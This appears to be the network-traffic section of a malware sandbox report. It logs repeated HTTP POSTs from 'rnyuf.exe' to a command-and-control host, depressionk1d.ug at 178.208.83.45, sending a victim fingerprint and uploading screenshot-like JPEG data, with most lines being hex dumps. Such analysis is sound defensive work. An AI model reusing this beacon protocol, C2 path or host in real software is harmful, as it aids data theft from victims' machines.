                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          382192.168.2.450233178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:57.158143044 CET18073OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:57.190752983 CET18073INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:57 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          383192.168.2.450234178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:57.405000925 CET18074OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:57.434370995 CET18074INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:57 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          384192.168.2.450235178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:57.564311028 CET18075OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:57.599610090 CET18075INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:57 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          385192.168.2.450236178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:57.739643097 CET18076OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:57.766443014 CET18076INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:57 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:24:57.826219082 CET18077OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:57.826420069 CET18077OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:57.826664925 CET18087OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:57.826797962 CET18090OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:57.850434065 CET18101OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:57.850497007 CET18116OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:24:57.873207092 CET18127OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:24:57.873249054 CET18138OUTData Raw: a4 20 a2 92 8a 00 70 3c 62 83 48 3a d2 9a 77 01 28 a5 e9 45 00 02 96 92 96 81 31 69 28 a2 98 87 0a 5a 41 4b 4c 1e e1 4b 8a 4a 5a 62 02 29 3b d2 d2 1a 00 05 38 50 28 a0 40 29 c2 9a 69 45 50 98 ea 28 a5 1d 69 88 51 4a 28 14 b4 d1 22 af a5 29 18 a4
                          Data Ascii: p<bH:w(E1i(ZAKLKJZb);8P(@)iEP(iQJ(")ykbDE XC8SH*,()Bbu'Zx6\bLB)vRBQIR`$xQjRZh+Tbc|*LQVfKLRF(xN)Mpd=))H(
                          Nov 12, 2021 22:24:57.873306036 CET18148OUTData Raw: a8 66 88 72 f5 a7 e6 9a 29 d5 0c d1 0f 53 c5 79 17 c4 f0 16 f2 c7 1f f3 cd ff 00 f4 2a f5 b1 d4 d7 91 fc 4e 3f e9 d6 3f f5 c9 bf f4 2a d2 87 c4 45 53 c7 5a 35 63 92 29 04 29 e9 52 62 94 57 2f 2a 3d 2e 66 33 ca 5e 3d a9 db 17 76 71 cd 2d 19 a7 64
                          Data Ascii: fr)Sy*N??*ESZ5c))RbW/*=.f3^=vq-dbhN!] @7n4Z9P(t0hVBJ!@sE93Ri)c<Dx*J)rc1(nqO ``PFFHD~D#KIF=*c4yIOvBx
                          Nov 12, 2021 22:24:57.873322964 CET18155OUTData Raw: 6a 64 f3 0c c5 2e 2a 50 86 94 25 04 f3 11 81 4f 02 9e 14 53 c0 5a 64 b9 11 85 a7 84 a7 82 a3 bd 1e 6a 0f e2 14 10 db 62 04 a7 04 a6 9b 98 87 f1 52 7d b6 31 d3 9a 77 42 e5 9b e8 4c 12 94 25 56 37 cb d8 53 7e da 4f 41 45 c3 d9 cc bd b7 14 a0 56 7f
                          Data Ascii: jd.*P%OSZdjbR}1wBL%V7S~OAEVD+RQVW1=w}ExURQa{"h[sFM7w9J~7xqBhh$\kc%5X5.w/YsFr-IM}b]\G
                          Nov 12, 2021 22:24:57.873339891 CET18159OUTData Raw: ea da 1b 26 9a de c2 45 56 43 3a bb b1 39 89 f0 15 42 75 c7 24 e4 d5 29 3c 31 61 71 79 69 0e 97 7e 6e 60 7d 5a 6b 09 ae 43 29 50 8b b5 96 41 81 d0 a1 62 4e 48 f9 0e 2a bd ac 39 ad fd 74 ff 00 31 7b 39 5a ff 00 d6 d7 39 4c 52 e2 bb 18 34 0d 0a f3
                          Data Ascii: &EVC:9Bu$)<1aqyi~n`}ZkC)PAbNH*9t1{9Z9LR4N:kq{cy}((<yX-|qK&TZq;/)Sw$(jEt:6jsZo[ilIs6c~uV'sj][j70e39n)g*3HO05D
                          Nov 12, 2021 22:24:57.924544096 CET18185INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:57 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          386192.168.2.450237178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:57.910067081 CET18184OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:57.936794043 CET18185INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:57 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          387192.168.2.450238178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:58.079689026 CET18186OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:58.107564926 CET18186INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:58 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          388192.168.2.450239178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:58.259754896 CET18187OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:58.286691904 CET18187INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:58 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:24:58.403852940 CET18187OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:58.404019117 CET18188OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:58.404156923 CET18198OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:58.404182911 CET18200OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:58.426749945 CET18211OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:58.426808119 CET18222OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:24:58.428675890 CET18227OUTData Raw: 1d c8 50 67 31 ec 90 15 65 23 95 c0 3f 74 0e 46 7d eb 95 8f 52 bf 8a dd ed e3 bd b9 48 5d 76 bc 6b 2b 05 61 e8 46 70 45 74 47 0d 2b dd b2 25 88 8d ac 91 56 92 8a 2b b4 e4 14 51 45 14 c0 2b e9 3f 83 cc bf f0 85 6d c8 dc 26 04 8f 63 1a 7f 81 af 9b
                          Data Ascii: Pg1e#?tF}RH]vk+aFpEtG+%V+QE+?m&c+oK>\Xr;+c*G:5)vRK[_f}+/5KHlb}(z9rZa{6>(Ucw5<OAK')uU+/ts`
                          Nov 12, 2021 22:24:58.449461937 CET18238OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:24:58.449522972 CET18253OUTData Raw: a4 20 a2 92 8a 00 70 3c 62 83 48 3a d2 9a 77 01 28 a5 e9 45 00 02 96 92 96 81 31 69 28 a2 98 87 0a 5a 41 4b 4c 1e e1 4b 8a 4a 5a 62 02 29 3b d2 d2 1a 00 05 38 50 28 a0 40 29 c2 9a 69 45 50 98 ea 28 a5 1d 69 88 51 4a 28 14 b4 d1 22 af a5 29 18 a4
                          Data Ascii: p<bH:w(E1i(ZAKLKJZb);8P(@)iEP(iQJ(")ykbDE XC8SH*,()Bbu'Zx6\bLB)vRBQIR`$xQjRZh+Tbc|*LQVfKLRF(xN)Mpd=))H(
                          Nov 12, 2021 22:24:58.449771881 CET18259OUTData Raw: 2b c0 6b dd be 03 de 5a da 78 7f 56 fb 4d cc 30 ee ba 5d be 6c 81 73 84 e7 19 ac 2b fc 06 b4 7e 23 9f ff 00 84 73 5c ff 00 a0 2e a3 ff 00 80 af fe 14 a3 c3 ba ea b0 61 a3 ea 40 83 90 45 ab f1 fa 57 bb ff 00 6c 69 9f f4 12 b3 ff 00 c0 84 ff 00 1a
                          Data Ascii: +kZxVM0]ls+~#s\.a@EWliO/v_]U?Y'Wwe)IdePLmZ5EU?AK/O>2eT6u<KSjV:wwje;j@S%-4&wN5X%WxP2
                          Nov 12, 2021 22:24:58.449853897 CET18269OUTData Raw: 6a 64 f3 0c c5 2e 2a 50 86 94 25 04 f3 11 81 4f 02 9e 14 53 c0 5a 64 b9 11 85 a7 84 a7 82 a3 bd 1e 6a 0f e2 14 10 db 62 04 a7 04 a6 9b 98 87 f1 52 7d b6 31 d3 9a 77 42 e5 9b e8 4c 12 94 25 56 37 cb d8 53 7e da 4f 41 45 c3 d9 cc bd b7 14 a0 56 7f
                          Data Ascii: jd.*P%OSZdjbR}1wBL%V7S~OAEVD+RQVW1=w}ExURQa{"h[sFM7w9J~7xqBhh$\kc%5X5.w/YsFr-IM}b]\G
                          Nov 12, 2021 22:24:58.499691963 CET18294INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:58 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          39192.168.2.449823178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:31.118264914 CET4121OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:31.144465923 CET4121INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:31 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:23:31.212877989 CET4121OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----ef6c84ac469cc5c9e34c56f18531b7d7
                          Host: depressionk1d.ug
                          Content-Length: 108941
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:31.213038921 CET4122OUTData Raw: 2d 2d 2d 2d 2d 2d 65 66 36 63 38 34 61 63 34 36 39 63 63 35 63 39 65 33 34 63 35 36 66 31 38 35 33 31 62 37 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------ef6c84ac469cc5c9e34c56f18531b7d7Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:31.213300943 CET4132OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:31.213475943 CET4134OUTData Raw: ed a0 ad 16 0b 8c a5 a3 6d 18 34 86 14 87 ad 2d 14 c4 25 2d 14 0a 06 14 51 41 a0 41 45 2a ab 31 c2 a9 27 d0 0a b2 9a 75 e4 9f 76 dd ff 00 e0 43 1f ce 84 9b d8 2e 55 a2 b4 93 44 ba 6f bc 63 4f a9 cf f2 aa d7 b6 86 ca 65 8c b8 62 57 76 40 c7 73 fe
                          Data Ascii: m4-%-QAAE*1'uvC.UDocOebWv@sNJhEvQE(((C@EPK@RHqlU a5dZ?*y#v1\AE-R@KK1@E-(P)hE-(&)h(-&(.(0
                          Nov 12, 2021 22:23:31.235795021 CET4140OUTData Raw: e1 ed 71 ec 61 bc d2 e6 99 a3 b1 bf 8c c6 ec 0f fa a6 23 01 fe 9d 8f a8 ad bf f8 55 5a e7 fc fd e9 df f7 f1 ff 00 f8 8a 3f e1 55 eb 9f f3 f7 a7 7f df c7 ff 00 e2 2b df 78 8c 1f 27 b3 e6 56 3e 75 61 f1 9c fe d3 95 dc d0 f0 77 88 26 b9 bb d2 b4 2b
                          Data Ascii: qa#UZ?U+x'V>uaw&++1\PA>W|n/z|/[EuqfCp(Tc*=GzQhyIU;GEP/E^4.J9\aAdq~?.J
                          Nov 12, 2021 22:23:31.235877037 CET4150OUTData Raw: cd 17 b1 5a 03 2b 47 74 64 72 64 90 2e 4f cc 9b 30 e7 82 17 19 e2 b6 34 4b 5b 7b 4d 32 c7 49 d4 75 cb 2b 49 35 b3 33 de 43 30 99 e4 75 70 63 81 83 22 32 70 e1 9c 65 87 50 7d eb ce bc a5 f4 a0 42 80 74 eb 4d d1 6d 38 f4 62 55 52 7c dd 51 e9 90 af
                          Data Ascii: Z+Gtdrd.O04K[{M2Iu+I53C0upc"2peP}BtMm8bUR|Q{sMm<goN+G3CIm)(n$98XB):b3%V-Y/[b-.U#\t<|G>ZcTN{jc+_A(QE)E@F(QEQE
                          Nov 12, 2021 22:23:31.235908031 CET4161OUTData Raw: db 65 64 2e 32 c4 9e 1b bd 59 ba f1 46 b7 79 77 f6 c9 66 b3 17 67 cc dd 3c 56 10 47 23 ef 42 8d b9 95 01 6c ab 11 ce 7a e7 ad 3f 67 57 5e fe f7 e3 b7 dc 39 54 a6 d9 ad 35 ac 1a 57 86 f5 4d 67 4e 82 09 ad a5 b8 b3 9b 4e 9a e6 dd 25 d9 1b 89 c3 c6
